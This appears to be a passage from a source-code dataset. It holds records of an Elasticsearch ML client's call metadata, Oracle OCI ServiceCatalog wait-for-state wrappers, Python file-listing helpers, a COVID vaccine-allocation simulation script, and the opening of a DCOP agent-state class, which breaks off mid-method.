'_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""model_snapshots"""', 'snapshot_id', '"""_update"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'model_snapshots',\n snapshot_id, '_update')\n", (13776, 13868), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((14252, 14300), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""filters"""', 'filter_id'], {}), "('_xpack', 'ml', 'filters', filter_id)\n", (14262, 14300), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((15416, 15513), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""results"""', '"""categories"""', 'category_id'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'results',\n 'categories', category_id)\n", (15426, 15513), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((16643, 16728), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""results"""', '"""influencers"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'results',\n 'influencers')\n", (16653, 16728), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((17291, 17343), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id)\n", (17301, 17343), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((17909, 17961), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id)\n", (17919, 17961), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((18298, 18363), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""_stats"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, '_stats')\n", (18308, 18363), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((19127, 19229), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""model_snapshots"""', 'snapshot_id', '"""_revert"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'model_snapshots',\n snapshot_id, '_revert')\n", (19137, 19229), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((20259, 20350), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""model_snapshots"""', 'snapshot_id'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'model_snapshots',\n snapshot_id)\n", (20269, 20350), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((20941, 21032), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""model_snapshots"""', 'snapshot_id'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'model_snapshots',\n snapshot_id)\n", (20951, 21032), 
False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n')] |
LaudateCorpus1/oci-python-sdk | src/oci/service_catalog/service_catalog_client_composite_operations.py | b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015 | # coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
import oci # noqa: F401
from oci.util import WAIT_RESOURCE_NOT_FOUND # noqa: F401
class ServiceCatalogClientCompositeOperations(object):
"""
This class provides a wrapper around :py:class:`~oci.service_catalog.ServiceCatalogClient` and offers convenience methods
for operations that would otherwise need to be chained together. For example, instead of performing an action
on a resource (e.g. launching an instance, creating a load balancer) and then using a waiter to wait for the resource
to enter a given state, you can call a single method in this class to accomplish the same functionality
"""
def __init__(self, client, **kwargs):
"""
Creates a new ServiceCatalogClientCompositeOperations object
:param ServiceCatalogClient client:
The service client which will be wrapped by this object
"""
self.client = client
def change_private_application_compartment_and_wait_for_state(self, private_application_id, change_private_application_compartment_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.change_private_application_compartment` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest`
to enter the given state(s).
:param str private_application_id: (required)
The unique identifier for the private application.
:param oci.service_catalog.models.ChangePrivateApplicationCompartmentDetails change_private_application_compartment_details: (required)
The details of the request to change the compartment of a given private application.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.change_private_application_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_private_application_compartment(private_application_id, change_private_application_compartment_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_private_application_and_wait_for_state(self, create_private_application_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.create_private_application` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest`
to enter the given state(s).
:param oci.service_catalog.models.CreatePrivateApplicationDetails create_private_application_details: (required)
Private application creation details.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.create_private_application`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_private_application(create_private_application_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_service_catalog_and_wait_for_state(self, create_service_catalog_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.create_service_catalog` and waits for the :py:class:`~oci.service_catalog.models.ServiceCatalog` acted upon
to enter the given state(s).
:param oci.service_catalog.models.CreateServiceCatalogDetails create_service_catalog_details: (required)
The details for creating a service catalog.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.ServiceCatalog.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.create_service_catalog`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_service_catalog(create_service_catalog_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_service_catalog(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_private_application_and_wait_for_state(self, private_application_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_private_application` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest`
to enter the given state(s).
:param str private_application_id: (required)
The unique identifier for the private application.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_private_application`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = None
try:
operation_result = self.client.delete_private_application(private_application_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_service_catalog_and_wait_for_state(self, service_catalog_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_service_catalog` and waits for the :py:class:`~oci.service_catalog.models.ServiceCatalog` acted upon
to enter the given state(s).
:param str service_catalog_id: (required)
The unique identifier for the service catalog.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.ServiceCatalog.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.delete_service_catalog`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
initial_get_result = self.client.get_service_catalog(service_catalog_id)
operation_result = None
try:
operation_result = self.client.delete_service_catalog(service_catalog_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
try:
waiter_result = oci.wait_until(
self.client,
initial_get_result,
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
succeed_on_not_found=True,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_private_application_and_wait_for_state(self, private_application_id, update_private_application_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.update_private_application` and waits for the :py:class:`~oci.service_catalog.models.WorkRequest`
to enter the given state(s).
:param str private_application_id: (required)
The unique identifier for the private application.
:param oci.service_catalog.models.UpdatePrivateApplicationDetails update_private_application_details: (required)
The details for updating the private application.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.update_private_application`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_private_application(private_application_id, update_private_application_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_service_catalog_and_wait_for_state(self, service_catalog_id, update_service_catalog_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.service_catalog.ServiceCatalogClient.update_service_catalog` and waits for the :py:class:`~oci.service_catalog.models.ServiceCatalog` acted upon
to enter the given state(s).
:param str service_catalog_id: (required)
The unique identifier for the service catalog.
:param oci.service_catalog.models.UpdateServiceCatalogDetails update_service_catalog_details: (required)
Details to update for a service catalog.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.service_catalog.models.ServiceCatalog.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.service_catalog.ServiceCatalogClient.update_service_catalog`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_service_catalog(service_catalog_id, update_service_catalog_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_service_catalog(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
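# ---------------------------------------------------------------------------
# Illustrative usage sketch (editorial addition, not part of the original
# module). The compartment OCID and display name are placeholders, and the
# ACTIVE lifecycle-state constant is assumed to exist on the ServiceCatalog
# model; ``max_wait_seconds`` is forwarded to :py:func:`oci.wait_until`.
def _example_composite_usage():  # pragma: no cover
    config = oci.config.from_file()  # reads ~/.oci/config by default
    client = oci.service_catalog.ServiceCatalogClient(config)
    composite = ServiceCatalogClientCompositeOperations(client)

    details = oci.service_catalog.models.CreateServiceCatalogDetails(
        compartment_id="ocid1.compartment.oc1..example",
        display_name="example-catalog",
    )
    # Create the catalog and block until it reaches the ACTIVE state.
    result = composite.create_service_catalog_and_wait_for_state(
        details,
        wait_for_states=[oci.service_catalog.models.ServiceCatalog.LIFECYCLE_STATE_ACTIVE],
        waiter_kwargs={"max_wait_seconds": 600},
    )
    print(result.data.id)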
| [((3626, 3713), 'oci.exceptions.CompositeOperationError', 'oci.exceptions.CompositeOperationError', ([], {'partial_results': '[operation_result]', 'cause': 'e'}), '(partial_results=[operation_result],\n cause=e)\n', (3664, 3713), False, 'import oci\n'), ((5780, 5867), 'oci.exceptions.CompositeOperationError', 'oci.exceptions.CompositeOperationError', ([], {'partial_results': '[operation_result]', 'cause': 'e'}), '(partial_results=[operation_result],\n cause=e)\n', (5818, 5867), False, 'import oci\n'), ((7932, 8019), 'oci.exceptions.CompositeOperationError', 'oci.exceptions.CompositeOperationError', ([], {'partial_results': '[operation_result]', 'cause': 'e'}), '(partial_results=[operation_result],\n cause=e)\n', (7970, 8019), False, 'import oci\n'), ((10228, 10315), 'oci.exceptions.CompositeOperationError', 'oci.exceptions.CompositeOperationError', ([], {'partial_results': '[operation_result]', 'cause': 'e'}), '(partial_results=[operation_result],\n cause=e)\n', (10266, 10315), False, 'import oci\n'), ((12549, 12636), 'oci.exceptions.CompositeOperationError', 'oci.exceptions.CompositeOperationError', ([], {'partial_results': '[operation_result]', 'cause': 'e'}), '(partial_results=[operation_result],\n cause=e)\n', (12587, 12636), False, 'import oci\n'), ((14881, 14968), 'oci.exceptions.CompositeOperationError', 'oci.exceptions.CompositeOperationError', ([], {'partial_results': '[operation_result]', 'cause': 'e'}), '(partial_results=[operation_result],\n cause=e)\n', (14919, 14968), False, 'import oci\n'), ((17180, 17267), 'oci.exceptions.CompositeOperationError', 'oci.exceptions.CompositeOperationError', ([], {'partial_results': '[operation_result]', 'cause': 'e'}), '(partial_results=[operation_result],\n cause=e)\n', (17218, 17267), False, 'import oci\n')] |
BrianOfrim/boja | vision/_file_utils.py | 6571fbbfb7f015e96e80e822d9dc96b4636b4119 | from typing import List
import os
import re
def create_output_dir(dir_name) -> bool:
if not os.path.isdir(dir_name) or not os.path.exists(dir_name):
print("Creating output directory: %s" % dir_name)
try:
os.makedirs(dir_name)
except OSError:
print("Creation of the directory %s failed" % dir_name)
return False
else:
print("Successfully created the directory %s " % dir_name)
return True
else:
return True
def get_files_from_dir(dir_path: str, file_type: str = None) -> List[str]:
if not os.path.isdir(dir_path):
return []
file_paths = [
f for f in os.listdir(dir_path) if os.path.isfile(os.path.join(dir_path, f))
]
if file_type is not None:
file_paths = [f for f in file_paths if f.lower().endswith(file_type.lower())]
return file_paths
def _int_string_sort(file_name) -> int:
match = re.match("[0-9]+", os.path.basename(file_name))
if not match:
return 0
return int(match[0])
def get_highest_numbered_file(
dir_path: str, file_type: str = None, filter_keyword=None
) -> str:
file_names = get_files_from_dir(dir_path)
if file_type is not None:
file_names = [
file_name
for file_name in file_names
if file_name.lower().endswith(file_type.lower())
]
if filter_keyword is not None:
file_names = [
file_name
for file_name in file_names
if filter_keyword.lower() in file_name.lower()
]
if len(file_names) == 0:
return None
highest_numbered_file = sorted(file_names, key=_int_string_sort, reverse=True)[0]
return os.path.join(dir_path, highest_numbered_file)
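# Illustrative usage sketch (editorial addition, not part of the original
# module): typical use when resuming from the most recent numbered artifact.
# The directory name, extension and keyword are placeholder values.
def _example_usage() -> None:
    checkpoint_dir = "checkpoints"
    if create_output_dir(checkpoint_dir):
        latest = get_highest_numbered_file(
            checkpoint_dir, file_type=".pt", filter_keyword="model"
        )
        print("Most recent checkpoint:", latest)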
| [((1730, 1775), 'os.path.join', 'os.path.join', (['dir_path', 'highest_numbered_file'], {}), '(dir_path, highest_numbered_file)\n', (1742, 1775), False, 'import os\n'), ((604, 627), 'os.path.isdir', 'os.path.isdir', (['dir_path'], {}), '(dir_path)\n', (617, 627), False, 'import os\n'), ((968, 995), 'os.path.basename', 'os.path.basename', (['file_name'], {}), '(file_name)\n', (984, 995), False, 'import os\n'), ((98, 121), 'os.path.isdir', 'os.path.isdir', (['dir_name'], {}), '(dir_name)\n', (111, 121), False, 'import os\n'), ((129, 153), 'os.path.exists', 'os.path.exists', (['dir_name'], {}), '(dir_name)\n', (143, 153), False, 'import os\n'), ((238, 259), 'os.makedirs', 'os.makedirs', (['dir_name'], {}), '(dir_name)\n', (249, 259), False, 'import os\n'), ((685, 705), 'os.listdir', 'os.listdir', (['dir_path'], {}), '(dir_path)\n', (695, 705), False, 'import os\n'), ((724, 749), 'os.path.join', 'os.path.join', (['dir_path', 'f'], {}), '(dir_path, f)\n', (736, 749), False, 'import os\n')] |
COVID-IWG/epimargin-studies | vaccine_allocation/epi_simulations.py | 7d4a78e2e6713c6a0aea2cd2440529153e9a635d | import dask
import numpy as np
import pandas as pd
from epimargin.models import Age_SIRVD
from epimargin.utils import annually, normalize, percent, years
from studies.vaccine_allocation.commons import *
from tqdm import tqdm
import warnings
warnings.filterwarnings("error")
num_sims = 1000
simulation_range = 1 * years
phi_points = [_ * percent * annually for _ in (25, 50, 100, 200)]
simulation_initial_conditions = pd.read_csv(data/f"all_india_coalesced_scaling_Apr15.csv")\
.drop(columns = ["Unnamed: 0"])\
.set_index(["state", "district"])
rerun_states = ["Telangana", "Uttarakhand", "Jharkhand", "Arunachal Pradesh", "Nagaland", "Sikkim"] + coalesce_states
districts_to_run = simulation_initial_conditions
num_age_bins = 7
seed = 0
MORTALITY = [6, 5, 4, 3, 2, 1, 0]
CONTACT = [1, 2, 3, 4, 0, 5, 6]
CONSUMPTION = [4, 5, 6, 3, 2, 1, 0]
def save_metrics(tag, policy, dst = tev_src):
np.savez_compressed(dst/f"{tag}.npz",
dT = policy.dT_total,
dD = policy.dD_total,
pi = policy.pi,
q0 = policy.q0,
q1 = policy.q1,
Dj = policy.D
)
def prioritize(num_doses, S, prioritization):
Sp = S[:, prioritization]
dV = np.where(Sp.cumsum(axis = 1) <= num_doses, Sp, 0)
dV[np.arange(len(dV)), (Sp.cumsum(axis = 1) > dV.cumsum(axis = 1)).argmax(axis = 1)] = num_doses - dV.sum(axis = 1)
return dV[:, sorted(range(len(prioritization)), key = prioritization.__getitem__)].clip(0, S)
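# Worked example (editorial addition): with a single simulation row
# S = [[10, 20, 30, 40, 50, 60, 70]] (susceptibles per age bin), the mortality
# ordering MORTALITY = [6, 5, 4, 3, 2, 1, 0] and num_doses = 100, the bins are
# filled greedily in priority order: bin 6 (70 susceptible) is covered fully
# and the remaining 30 doses go to bin 5, so prioritize(...) returns
# [[0, 0, 0, 0, 0, 30, 70]].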
def process(district_data):
(
(state, district), state_code,
sero_0, N_0, sero_1, N_1, sero_2, N_2, sero_3, N_3, sero_4, N_4, sero_5, N_5, sero_6, N_6, N_tot,
Rt, Rt_upper, Rt_lower, S0, I0, R0, D0, dT0, dD0, V0, T_ratio, R_ratio
) = district_data
try:
S0 = int(S0)
except ValueError as e:
print (state, district, e)
return
Sj0 = np.array([(1 - sj) * Nj for (sj, Nj) in zip([sero_0, sero_1, sero_2, sero_3, sero_4, sero_5, sero_6], [N_0, N_1, N_2, N_3, N_4, N_5, N_6])])
# distribute historical doses assuming mortality prioritization
Sj0 = prioritize(V0, Sj0.copy()[None, :], MORTALITY)[0]
def get_model(seed = 0):
model = Age_SIRVD(
name = state_code + "_" + district,
population = N_tot - D0,
dT0 = (np.ones(num_sims) * dT0).astype(int),
Rt0 = 0 if S0 == 0 else Rt * N_tot / S0,
S0 = np.tile( Sj0, num_sims).reshape((num_sims, -1)),
I0 = np.tile((fI * I0).T, num_sims).reshape((num_sims, -1)),
R0 = np.tile((fR * R0).T, num_sims).reshape((num_sims, -1)),
D0 = np.tile((fD * D0).T, num_sims).reshape((num_sims, -1)),
mortality = np.array(list(OD_IFRs.values())),
infectious_period = infectious_period,
random_seed = seed,
)
model.dD_total[0] = np.ones(num_sims) * dD0
model.dT_total[0] = np.ones(num_sims) * dT0
return model
for phi in phi_points:
num_doses = phi * (S0 + I0 + R0)
sim_tag = f"{state_code}_{district}_phi{int(phi * 365 * 100)}_"
random_model, mortality_model, contact_model, no_vax_model = [get_model(seed) for _ in range(4)]
for t in range(simulation_range):
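            # Vaccinate only for the first 1/phi steps, i.e. roughly until the
            # initially eligible population (S0 + I0 + R0) has been offered a
            # dose at the per-step rate phi; afterwards no doses are given.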
if t <= 1/phi:
dV_random = num_doses * normalize(random_model.N[-1], axis = 1).clip(0)
dV_mortality = prioritize(num_doses, mortality_model.N[-1], MORTALITY ).clip(0)
dV_contact = prioritize(num_doses, contact_model.N[-1], CONTACT ).clip(0)
else:
dV_random, dV_mortality, dV_contact = np.zeros((num_sims, 7)), np.zeros((num_sims, 7)), np.zeros((num_sims, 7))
random_model .parallel_forward_epi_step(dV_random, num_sims = num_sims)
mortality_model.parallel_forward_epi_step(dV_mortality, num_sims = num_sims)
contact_model .parallel_forward_epi_step(dV_contact, num_sims = num_sims)
no_vax_model .parallel_forward_epi_step(dV = np.zeros((7, num_sims))[:, 0], num_sims = num_sims)
if phi == phi_points[0]:
save_metrics(sim_tag + "novax", no_vax_model )
save_metrics(sim_tag + "random", random_model )
save_metrics(sim_tag + "mortality", mortality_model)
save_metrics(sim_tag + "contact", contact_model )
if __name__ == "__main__":
distribute = False
if distribute:
with dask.config.set({"scheduler.allowed-failures": 1}):
client = dask.distributed.Client(n_workers = 1, threads_per_worker = 1)
print(client.dashboard_link)
with dask.distributed.get_task_stream(client) as ts:
futures = []
for district in districts_to_run.itertuples():
futures.append(client.submit(process, district, key = ":".join(district[0])))
dask.distributed.progress(futures)
else:
failures = []
for t in tqdm(districts_to_run.itertuples(), total = len(districts_to_run)):
process(t)
# try:
# process(t)
# except Exception as e:
# failures.append((e, t))
for failure in failures:
print(failure)
| [((242, 274), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""error"""'], {}), "('error')\n", (265, 274), False, 'import warnings\n'), ((937, 1076), 'numpy.savez_compressed', 'np.savez_compressed', (["(dst / f'{tag}.npz')"], {'dT': 'policy.dT_total', 'dD': 'policy.dD_total', 'pi': 'policy.pi', 'q0': 'policy.q0', 'q1': 'policy.q1', 'Dj': 'policy.D'}), "(dst / f'{tag}.npz', dT=policy.dT_total, dD=policy.\n dD_total, pi=policy.pi, q0=policy.q0, q1=policy.q1, Dj=policy.D)\n", (956, 1076), True, 'import numpy as np\n'), ((2950, 2967), 'numpy.ones', 'np.ones', (['num_sims'], {}), '(num_sims)\n', (2957, 2967), True, 'import numpy as np\n'), ((3002, 3019), 'numpy.ones', 'np.ones', (['num_sims'], {}), '(num_sims)\n', (3009, 3019), True, 'import numpy as np\n'), ((4548, 4598), 'dask.config.set', 'dask.config.set', (["{'scheduler.allowed-failures': 1}"], {}), "({'scheduler.allowed-failures': 1})\n", (4563, 4598), False, 'import dask\n'), ((4621, 4679), 'dask.distributed.Client', 'dask.distributed.Client', ([], {'n_workers': '(1)', 'threads_per_worker': '(1)'}), '(n_workers=1, threads_per_worker=1)\n', (4644, 4679), False, 'import dask\n'), ((4992, 5026), 'dask.distributed.progress', 'dask.distributed.progress', (['futures'], {}), '(futures)\n', (5017, 5026), False, 'import dask\n'), ((433, 493), 'pandas.read_csv', 'pd.read_csv', (["(data / f'all_india_coalesced_scaling_Apr15.csv')"], {}), "(data / f'all_india_coalesced_scaling_Apr15.csv')\n", (444, 493), True, 'import pandas as pd\n'), ((4742, 4782), 'dask.distributed.get_task_stream', 'dask.distributed.get_task_stream', (['client'], {}), '(client)\n', (4774, 4782), False, 'import dask\n'), ((3722, 3745), 'numpy.zeros', 'np.zeros', (['(num_sims, 7)'], {}), '((num_sims, 7))\n', (3730, 3745), True, 'import numpy as np\n'), ((3747, 3770), 'numpy.zeros', 'np.zeros', (['(num_sims, 7)'], {}), '((num_sims, 7))\n', (3755, 3770), True, 'import numpy as np\n'), ((3772, 3795), 'numpy.zeros', 'np.zeros', (['(num_sims, 7)'], {}), '((num_sims, 7))\n', (3780, 3795), True, 'import numpy as np\n'), ((2467, 2489), 'numpy.tile', 'np.tile', (['Sj0', 'num_sims'], {}), '(Sj0, num_sims)\n', (2474, 2489), True, 'import numpy as np\n'), ((2549, 2579), 'numpy.tile', 'np.tile', (['(fI * I0).T', 'num_sims'], {}), '((fI * I0).T, num_sims)\n', (2556, 2579), True, 'import numpy as np\n'), ((2631, 2661), 'numpy.tile', 'np.tile', (['(fR * R0).T', 'num_sims'], {}), '((fR * R0).T, num_sims)\n', (2638, 2661), True, 'import numpy as np\n'), ((2713, 2743), 'numpy.tile', 'np.tile', (['(fD * D0).T', 'num_sims'], {}), '((fD * D0).T, num_sims)\n', (2720, 2743), True, 'import numpy as np\n'), ((4135, 4158), 'numpy.zeros', 'np.zeros', (['(7, num_sims)'], {}), '((7, num_sims))\n', (4143, 4158), True, 'import numpy as np\n'), ((2341, 2358), 'numpy.ones', 'np.ones', (['num_sims'], {}), '(num_sims)\n', (2348, 2358), True, 'import numpy as np\n'), ((3405, 3442), 'epimargin.utils.normalize', 'normalize', (['random_model.N[-1]'], {'axis': '(1)'}), '(random_model.N[-1], axis=1)\n', (3414, 3442), False, 'from epimargin.utils import annually, normalize, percent, years\n')] |
nandofioretto/py_dcop | src/core/agent_state.py | fb2dbc97b69360f5d1fb67d84749e44afcdf48c3 | '''Every agent has an agent state, which is its local view of the world'''
import numpy as np
import itertools
class AgentState:
def __init__(self, name, agt, seed=1234):
self.name = name
self.prng = np.random.RandomState(seed)
# contains the variable assignment (exploreD) for this agent and its neighbors
self.variables_assignments = {var.name: var.value for var in agt.variables}
self.this_agt = agt
## Data structures to explore assignment local to an agent
self.my_vars = [var.name for var in agt.variables]
# the iterator to all possible assignment for this agent
self.assignment_it = 0
# All possible assignments for the variables of this agent
domains = [var.domain for var in agt.variables]
self.agt_assignments_list = list(itertools.product(*domains))
def addNeighborsVariables(self, neighbor):
for var in neighbor.variables:
self.variables_assignments[var.name] = var.value
def recvNeighborsValues(self, neighbor):
for var in neighbor.variables:
